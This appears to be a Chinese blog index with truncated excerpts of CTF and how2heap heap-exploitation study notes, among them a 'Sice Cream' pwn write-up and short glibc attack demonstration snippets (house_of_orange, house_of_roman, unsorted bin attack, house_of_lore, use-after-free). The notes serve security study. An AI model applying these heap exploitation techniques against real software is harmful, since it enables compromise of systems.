-
PWN - Sice Cream
sice_cream 题目链接 刚开始做到一半就没啥思路了,在看到并理解了how2heap - house_of_orange之后就回过头来把这题做了。主要用到的技术:DoubleFree + unsorted bin attack + FSOP。 大致介绍下程序,选项1是malloc你指定的大小,可以malloc多个,选项2可以选择性的free你之前malloc的内存。有一个全局变量USER_NAME,选项3重命名并输出它。 clot@ubuntu:~/CTF/sice_cream$ ./sice_cream Welcome to the Sice Cream Store! We have the best sice cream in the world! Whats your name? > a 1. Buy sice cream 2. Eat sice cream 3. Reintroduce yourself 4. Exit > 思路 通过double...
-
Heap Exploitation - how2heap - house_of_orange
house_of_orange unsorted bin attack + FSOP 先是利用unsorted bin attack来实现任意地址改写,再通过伪造__IO_list_all结构体来完成任意代码执行,具体分析见下。(下面源码中删除了大段的注释和log。) int winner ( char *ptr); int main() { char *p1, *p2; size_t io_list_all, *top; // 1 p1 = malloc(0x400-16); top = (size_t *) ( (char *) p1 + 0x400 - 16); top[1] = 0xc01; p2 = malloc(0x1000); io_list_all = top[2] +...
-
Heap Exploitation - how2heap house_of_roman
house_of_roman 该程序涉及到的攻击方法可以绕过ASLR,并且没有地方leak libc地址时候。整个程序被分为5个步骤: int main(){ init(); // 1 puts("Step 1: Point fastbin chunk to __malloc_hook\n\n"); puts("Setting up chunks for relative overwrites with heap feng shui.\n"); // Use this as the UAF chunk later to edit the heap pointer later to point to the LibC value. uint8_t* fastbin_victim = malloc(0x60); //...
-
Heap Exploitation - how2heap 3
unosrted_bin_attack 这种攻击可用于将某个地址的值修改为一个比较大的值,也有用于修改global_max_fast后利用fastbin attack的。 int main(){ fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n"); fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the " "global variable global_max_fast in libc for further fastbin attack\n\n"); // 1 unsigned...
-
Heap Exploitation - how2heap 2
how2heap house_of_lore 这个例子主要是通过伪造chunk、fd和bk指针,使栈上的地址被安排到smallbin中,再通过malloc和memcpy来伪造数据,更改返回地址。 void jackpot(){ fprintf(stderr, "Nice jump d00d\n"); exit(0); } int main(int argc, char * argv[]){ // 1 intptr_t* stack_buffer_1[4] = {0}; intptr_t* stack_buffer_2[3] = {0}; intptr_t *victim = malloc(0x100); // victim-WORD_SIZE because we need to remove the header size in order to have the absolute address of the...
-
Heap Exploitation - how2heap 1
how2heap 引用的代码中只摘取了关键的部分。 first_fit char* a = malloc(0x512); char* b = malloc(0x256); char* c; strcpy(a, "this is A!"); free(a); c = malloc(0x500); strcpy(c, "this is C!"); a释放后未重置为NULL,c被分配的内存就是a原本指向的内存,导致原指针a指向的数据被更改。也就是uaf的漏洞利用。 calc_tcache_idx 这里主要介绍了tcache的index的算法逻辑。 IDX = (CHUNKSIZE - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT On a 64 bit system the current values are: MINSIZE: 0x20...